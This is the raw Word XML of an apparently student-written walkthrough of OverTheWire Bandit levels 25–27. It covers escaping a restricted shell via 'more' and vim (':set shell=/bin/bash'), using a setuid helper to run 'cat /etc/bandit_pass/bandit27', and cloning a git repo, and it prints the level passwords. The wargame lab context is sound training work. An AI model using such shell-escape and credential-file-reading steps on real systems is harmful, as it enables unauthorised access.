        <w:t>more ~/text.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03362FED" w14:textId="566DED5A" w:rsidR="00605C36" w:rsidRDefault="00B759B7" w:rsidP="00B759B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B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exit 0</w:t>
      </w:r>
      <w:r w:rsidR="00605C36" w:rsidRPr="00B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52376CFC" w14:textId="335CF0D7" w:rsidR="00B759B7" w:rsidRDefault="00B759B7" w:rsidP="00B759B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5778C40A" w14:textId="7B6BACBC" w:rsidR="00161898" w:rsidRDefault="008B0ABC" w:rsidP="004B7B9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t uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to display text.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A2CEE3" w14:textId="6D6AC16B" w:rsidR="00453EBE" w:rsidRDefault="008B0ABC" w:rsidP="00453EB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After hours </w:t>
      </w:r>
      <w:r w:rsidR="00453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>with little help from google</w:t>
      </w:r>
      <w:r w:rsidR="00453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and reading the more manual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3C9F1E" w14:textId="77777777" w:rsidR="00453EBE" w:rsidRDefault="00453EBE" w:rsidP="00453EB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I decided to</w:t>
      </w:r>
      <w:r w:rsidR="008B0ABC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0ABC" w:rsidRPr="008B0ABC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>resize the terminal screen</w:t>
      </w:r>
      <w:r w:rsidR="008B0ABC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (to be smaller) and connect bandit26 with ssh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D44CD1" w14:textId="356618A5" w:rsidR="00161898" w:rsidRPr="00453EBE" w:rsidRDefault="008B0ABC" w:rsidP="00453EB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8B0ABC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ssh -I bandit26.sshkey bandit26@localhost</w:t>
      </w:r>
      <w:r w:rsidR="00453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>. I got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D68F4ED" w14:textId="65C1A99E" w:rsidR="00453EBE" w:rsidRDefault="00453EBE" w:rsidP="00453EB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453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26EFD11A" wp14:editId="1F8C55BB">
            <wp:extent cx="5943600" cy="708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0590" w14:textId="44721238" w:rsidR="00453EBE" w:rsidRDefault="00453EBE" w:rsidP="00453EB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</w:p>
    <w:p w14:paraId="6731CBDA" w14:textId="79CAA8A8" w:rsidR="00453EBE" w:rsidRDefault="00453EBE" w:rsidP="00453EB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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>{More command filter through text one screenful at a time – so if we decease the size of the screen it will display the file little by little}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB52C8A" w14:textId="377A9F8C" w:rsidR="00453EBE" w:rsidRDefault="00453EBE" w:rsidP="00453EB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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D2B78C" w14:textId="3A403B85" w:rsidR="0069353B" w:rsidRDefault="0069353B" w:rsidP="000975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Then </w:t>
      </w:r>
      <w:r w:rsidR="000975D5" w:rsidRPr="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>I pressed v</w:t>
      </w:r>
      <w:r w:rsidR="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001332B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">for displaying the file as vim, </w:t>
      </w:r>
      <w:r w:rsidR="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="008E0C69">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">enter </w:t>
      </w:r>
      <w:r w:rsidR="000975D5" w:rsidRPr="008E0C69">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>:e /etc/bandit_pass/bandit26</w:t>
      </w:r>
      <w:r w:rsidR="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> for editing bandit26’s password </w:t>
      </w:r>
      <w:r w:rsidR="008E0C69">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">(and </w:t>
      </w:r>
      <w:r w:rsidR="008E0C69">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">of course </w:t>
      </w:r>
      <w:r w:rsidR="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">display it). I got the following output: </w:t>
      </w:r>
      <w:r w:rsidRPr="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z</w:t>
      </w:r>
      <w:r w:rsidR="000975D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38410C" w14:textId="246371B6" w:rsidR="004315E9" w:rsidRDefault="004315E9" w:rsidP="000975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73CB72DE" w14:textId="16DF95AD" w:rsidR="00CB6207" w:rsidRDefault="00CB6207" w:rsidP="00EA4BE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We got the password, but </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BE8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BE8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>want</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set the shell from showtext to bash</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BE8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BE8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BE8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>need to enter (within vim) the command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6207">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>:set shell=/bin/bash</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BE8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then enter the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6207">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>:shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BE8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>for running bash shell with user bandit26!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C2C284" w14:textId="77777777" w:rsidR="00CB6207" w:rsidRDefault="00CB6207" w:rsidP="000975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06C41C30" w14:textId="77777777" w:rsidR="009E09D8" w:rsidRDefault="009E09D8" w:rsidP="000975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</w:p>
    <w:p w14:paraId="631864F8" w14:textId="77777777" w:rsidR="009E09D8" w:rsidRDefault="009E09D8" w:rsidP="000975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</w:p>
    <w:p w14:paraId="583D95AA" w14:textId="77777777" w:rsidR="009E09D8" w:rsidRDefault="009E09D8" w:rsidP="000975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</w:p>
    <w:p w14:paraId="42D6FCD9" w14:textId="39E66F03" w:rsidR="004315E9" w:rsidRDefault="004315E9" w:rsidP="000975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4315E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bandit26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6474FB" w14:textId="4448F0E5" w:rsidR="009E09D8" w:rsidRDefault="009E09D8" w:rsidP="000975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After I got shell, I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5421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>to view the folder’s files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E55DC" w14:textId="3CD0CAF9" w:rsidR="009E09D8" w:rsidRDefault="009E09D8" w:rsidP="000975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There was the file </w:t>
      </w:r>
      <w:r w:rsidRPr="009E09D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>text.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and an execute file named </w:t>
      </w:r>
      <w:r w:rsidRPr="009E09D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandit27.do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31079729" w14:textId="0B3EDE88" w:rsidR="009E09D8" w:rsidRDefault="009E09D8" w:rsidP="000975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05EBCAB2" w14:textId="577F57FD" w:rsidR="009E09D8" w:rsidRDefault="009E09D8" w:rsidP="000975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The file bandit27.do used the command </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="002D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>execute bash files. For getting next level password I created a bash file with the commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5F67BD" w14:textId="2E5351AE" w:rsidR="002D5421" w:rsidRPr="002D5421" w:rsidRDefault="002D5421" w:rsidP="000975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2D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/samuelScripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E845E" w14:textId="34E81291" w:rsidR="002D5421" w:rsidRPr="002D5421" w:rsidRDefault="002D5421" w:rsidP="000975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2D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cd /tmp/samuelScripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461D1D8A" w14:textId="30C64CDB" w:rsidR="002D5421" w:rsidRPr="002D5421" w:rsidRDefault="002D5421" w:rsidP="000975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2D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>nano bandit26.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F2C46" w14:textId="073F6FAB" w:rsidR="002D5421" w:rsidRPr="002D5421" w:rsidRDefault="002D5421" w:rsidP="000975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2D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>chmod 777 bandit26.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AB9B0F" w14:textId="7D68612B" w:rsidR="002D5421" w:rsidRDefault="002D5421" w:rsidP="000975D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164CC1B7" w14:textId="2FB2F79A" w:rsidR="002D5421" w:rsidRPr="002D5421" w:rsidRDefault="002D5421" w:rsidP="002D542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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In the file bandit26.run there was the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat /etc/bandit_pass/bandit27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FC6BAC" w14:textId="25E26350" w:rsidR="004315E9" w:rsidRDefault="002D5421" w:rsidP="002D542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Then, I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>~/bandit27.do /tmp/samuelScripts/bandit26.run</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5421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>and got the following output</w:t>
      </w:r>
      <w:r w:rsidR="000C0860">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the password for the next level)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5421">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3ba3118a22e93127a4ed485be72ef5ea</w:t>
      </w:r>
      <w:r w:rsidR="00FF62FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F56E065" w14:textId="16748E96" w:rsidR="00FF62FE" w:rsidRDefault="00FF62FE" w:rsidP="002D542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662D8E69" w14:textId="0E63DCF7" w:rsidR="00FF62FE" w:rsidRDefault="00FF62FE" w:rsidP="002D542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FF62FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28209F03" w14:textId="1C96EAC4" w:rsidR="00FF62FE" w:rsidRDefault="00372486" w:rsidP="002D542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First before I cloned the repository, I created a directory in tmp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAAFD78" w14:textId="2298D80E" w:rsidR="00372486" w:rsidRDefault="00372486" w:rsidP="002D542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372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/samuelGit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B00D4" w14:textId="2FFB79D7" w:rsidR="00372486" w:rsidRDefault="00372486" w:rsidP="002D542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</w:p>
    <w:p w14:paraId="5D7E091E" w14:textId="7593668D" w:rsidR="00372486" w:rsidRDefault="00372486" w:rsidP="002D542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Then I cloned the repository using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59577047" w14:textId="25B82AD5" w:rsidR="00372486" w:rsidRDefault="00372486" w:rsidP="00C72A1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372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git clone ssh://bandit27-git@localhost/home/bandit27-git/repo /tmp/samuelGit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C3568" w14:textId="02DF13C3" w:rsidR="00372486" w:rsidRDefault="00372486" w:rsidP="00372486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I entered the password (</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>3ba3118a22e93127a4ed485be72ef5ea)</w:t>
      </w:r>
      <w:r w:rsidR="00C72A14">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the</w:t>
      </w:r>
      <w:r w:rsidR="001D2C8A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72A14">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B97DD74" w14:textId="3FCB01B5" w:rsidR="00C72A14" w:rsidRPr="00C72A14" w:rsidRDefault="00C72A14" w:rsidP="00C72A1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72A14">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“remote: Counting objects: 3, done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C178A4C" w14:textId="77777777" w:rsidR="00C72A14" w:rsidRPr="00C72A14" w:rsidRDefault="00C72A14" w:rsidP="00C72A1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72A14">
        <w:rPr>
